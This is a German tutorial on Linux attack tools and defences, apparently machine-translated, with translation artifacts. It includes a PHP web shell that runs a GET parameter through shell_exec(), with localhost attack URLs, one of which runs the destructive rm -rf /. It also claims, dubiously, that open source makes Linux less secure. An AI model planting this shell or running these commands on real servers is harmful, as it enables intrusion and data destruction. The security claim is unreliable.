Linux-Betriebssystem hacken: Hacken mit Ubuntu (Befehls-Tutorial)

Linux ist das am weitesten verbreitete Server-Betriebssystem, insbesondere für Webserver. Es ist Open Source; Dies bedeutet, dass jeder Zugriff auf den Quellcode haben kann. Dies macht es im Vergleich zu anderen Betriebssystemen weniger sicher, da Angreifer den Quellcode untersuchen können, um Schwachstellen zu finden. Linux Bei „Hackers“ geht es darum, diese Schwachstellen auszunutzen, um sich unbefugten Zugriff auf ein System zu verschaffen.

In diesem Artikel stellen wir Ihnen vor, was Linux ist, welche Sicherheitslücken es hat, wie man mit Ubuntu hackt und welche Gegenmaßnahmen Sie ergreifen können.

Kurzer Hinweis zu Linux

Linux ist ein Open Source-Betriebssystem. Es gibt viele Distributionen von Linux-basierten Betriebssystemen wie Redhat, Fedora und Ubuntu usw. Im Gegensatz zu anderen Betriebssystemen ist Linux in puncto Sicherheit weniger sicher. Dies liegt daran, dass der Quellcode frei verfügbar ist, sodass es im Vergleich zu anderen Betriebssystemen, die nicht Open Source sind, einfacher ist, ihn auf Schwachstellen zu untersuchen und auszunutzen. Linux kann als Server-, Desktop-, Tablet- oder Mobilgeräte-Betriebssystem verwendet werden.

Linux-Programme können entweder über GUI oder Befehle bedient werden. Die Linux-Befehle für Kali Linux Hacking sind effektiver und effizienter als die Verwendung der GUI. Aus diesem Grund ist es hilfreich, grundlegende Linux-Befehle zum Hacken zu kennen.

Sehen Sie sich diese Tutorials an https://www.guru99.com/unix-linux-tutorial.html wie man damit anfängt Kali Linux Hacks.

Linux-Hacking-Tools

  • Nessus– Dieses Tool kann zum Hacken von Ubuntu, zum Scannen von Konfigurationseinstellungen, Patches und Netzwerken usw. verwendet werden. Es ist unter zu finden https://www.tenable.com/products/nessus
  • NKarte. Mit diesem Tool können Hosts überwacht werden, die auf dem Server ausgeführt werden, sowie die von ihnen genutzten Dienste. Es kann auch zum Scannen nach Ports verwendet werden. Es ist zu finden unter https://nmap.org/
  • SARA - SARA ist die Abkürzung für Security Auditor's Research Assistant. Wie der Name schon sagt, kann dieses Tool verwendet werden, um Netzwerke auf Bedrohungen wie zu überprüfen SQL Injection, XSS usw. finden Sie unter http://www-arc.com/sara/sara.html

Die obige Liste ist nicht vollständig; Es gibt Ihnen eine Vorstellung von den Tools, die zum Hacken von Ubuntu und Linux-Systemen verfügbar sind.

So verhindern Sie Linux-Hacks

Linux-Hacking nutzt die Schwachstellen des Betriebssystems aus. Eine Organisation kann Folgendes übernehmenwing Politik, um sich vor solchen Angriffen zu schützen.

  • Patch-Management– Patches beheben Fehler, die Angreifer ausnutzen, um ein System zu kompromittieren. Eine gute Patch-Management-Richtlinie stellt sicher, dass Sie ständig relevante Patches auf Ihr System anwenden.
  • Richtige Betriebssystemkonfiguration– Andere Exploits nutzen die Schwachstellen in der Konfiguration des Servers aus. Inaktive Benutzernamen und Daemons sollten deaktiviert werden. Standardeinstellungen wie allgemeine Passwörter für Anwendungen, Standardbenutzernamen und einige Portnummern sollten geändert werden.
  • Intrusion Detection System– Mit solchen Tools können unbefugte Zugriffe auf das System erkannt werden. Einige Tools verfügen über die Fähigkeit, solche Angriffe zu erkennen und zu verhindern.

Hacking-Aktivität: Hacken Sie ein Ubuntu-Linux-System mit PHP

In diesem praktischen Szenario lernen wir, wie man mit Ubuntu hackt, und geben Ihnen grundlegende Informationen zur Verwendung PHP ein Linux kompromittieren. Wir werden kein Opfer ins Visier nehmen. Wenn Sie es ausprobieren möchten, können Sie LAMPP auf Ihrem lokalen Computer installieren.

PHP verfügt über zwei Funktionen, mit denen Linux-Hacking-Befehle ausgeführt werden können. Es verfügt über die Funktionen exec() und shell_exec(). Die Funktion exec() gibt die letzte Zeile der Befehlsausgabe zurück, während shell_exec() das gesamte Ergebnis des Befehls als String zurückgibt.

Nehmen wir zu Demonstrationszwecken an, dass die Manager des Angreifers Folgendes hochladenwing Datei auf einem Webserver.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

HIER,

Das obige Skript ruft den Befehl von der GET-Variablen namens cmd ab. Der Befehl wird mit shell_exec() ausgeführt und die Ergebnisse werden im Browser zurückgegeben.

Der obige Code kann mit dem folgenden ausgenutzt werdenwing URL

http://localhost/cp/konsole.php?cmd=ls%20-l

HIER,

  • „…konsole.php?cmd=ls%20-l“weist der Variablen cmd den Wert ls –l zu.

Der Befehl in Ubuntu zum Hacken gegen den Server wird als ausgeführt

shell_exec('ls -l') ;

Das Ausführen des obigen Codes auf einem Webserver führt zu ähnlichen Ergebnissen wie folgtwing.

Hacken Sie ein Ubuntu-Linux-System mit PHP

Der obige Befehl zeigt einfach die Dateien im aktuellen Verzeichnis und die Berechtigungen an

Nehmen wir an, der Angreifer übergibt den Following Befehl

rm -rf /

HIER,

  • „rm“ entfernt die Dateien
  • „rf“ bewirkt, dass der Befehl rm in einem rekursiven Modus ausgeführt wird. Alle Ordner und Dateien löschen
  • „/“ weist den Befehl an, mit dem Löschen von Dateien aus dem Stammverzeichnis zu beginnen

Die Angriffs-URL würde etwa so aussehen

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Zusammenfassung

  • Linux ist ein beliebtes Betriebssystem für Server, Desktops, Tablets und mobile Geräte.
  • Linux ist Open Source und der Quellcode kann von jedem bezogen werden. Dies erleichtert das Erkennen von Schwachstellen. Es ist eines der besten Betriebssysteme für Hacker.
  • Grundlegende und Netzwerk-Hacking-Befehle in Ubuntu sind für Linux-Hacker wertvoll.
  • Schwachstellen sind Schwachstellen, die ausgenutzt werden können, um ein System zu kompromittieren.
  • Eine gute Sicherheit kann dazu beitragen, ein System vor der Kompromittierung durch einen Angreifer zu schützen.
Guru99 wird von Invicti gesponsert
Invicti

Invicti, die Entwickler der Proof Based Scanning-Technologie, haben das Guru99-Projekt gesponsert, um das Bewusstsein für die Sicherheit von Webanwendungen zu schärfen und mehr Entwicklern die Möglichkeit zu geben, sich mit dem Schreiben von sicherem Code vertraut zu machen